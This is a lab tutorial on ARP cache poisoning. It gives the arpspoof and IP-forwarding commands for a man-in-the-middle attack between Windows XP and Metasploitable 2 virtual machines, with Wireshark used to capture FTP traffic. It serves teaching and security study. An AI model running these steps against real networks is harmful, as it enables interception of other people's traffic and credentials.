The basic working of ARP can be shown as in the follwoing figure.

Fig. Basic ARP Working

ARP Cache poisoning attack:

ARP cache is flushed after some time as network topology changes. And any machine can give ARP reply. Thus attacker can also give ARP reply and the target will accept it regardless. Target doesn't even check if itself has sent any ARP request. Here you can see an ARP cache Poisoning attack with IP forwarding.

Fig. ARP cache forwording attack with IP forwarding

In the above diagram you can see that Kali Linux System is in between the communation of Metasploitable 2 (Target 1) and Xp (Target 2). This is called MITM (Man In The Middle) Attack. Due to IP forwarding, Kali Linux forwards the traffic coming from Metasploitable 2 system to XP system. Similary Kali can forwards the traffic from XP to Metasploitable 2. Thus all the traffic is going through Kali Linux. This is the intention behind ARP cache poisoning. Note that IP forwarding is necessary, otherwise a situation of DOS (Denial Of Service) attack will arise.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target 1 System : Windows Xp

• Target 2 System: Metasploitable 2

In Kali Linux Terminal

1. To start IP Forwarding in Kali Linux

~# echo 1 > /proc/sys/net/ipv4/ip_forward

2. To start MITM attack

~# arpspoof -i {interface} -t {taget 1} {target 2}

Here, i --> interface

{interface} --> Kali linux's interface e.g. wlan0

-t --> target

{target 1} --> IP address of target 1 e.g. Windows Xp

{target 2} --> IP address of target to be spoofed e.g. Metasplitable 2

3. Similarly, To start MITM attack in reverse direction

~# arpspoof -i {interface} -t {taget 1} {target 2}

Here, i --> interface

{interface} --> Kali linux's interface e.g. wlan0

-t --> target

{target 1} --> IP address of target 1 e.g. Metasplitable 2

{target 2} --> IP address of target to be spoofed e.g. Windows Xp

4. Now Turn On the wireshark in Kali Linux

5. Now you can try connecting Xp with any service of Metasplitable 2. e.g. FTP service.

6. You can see the traffic goining between Xp and Metasploitable 2 in Kali Linux.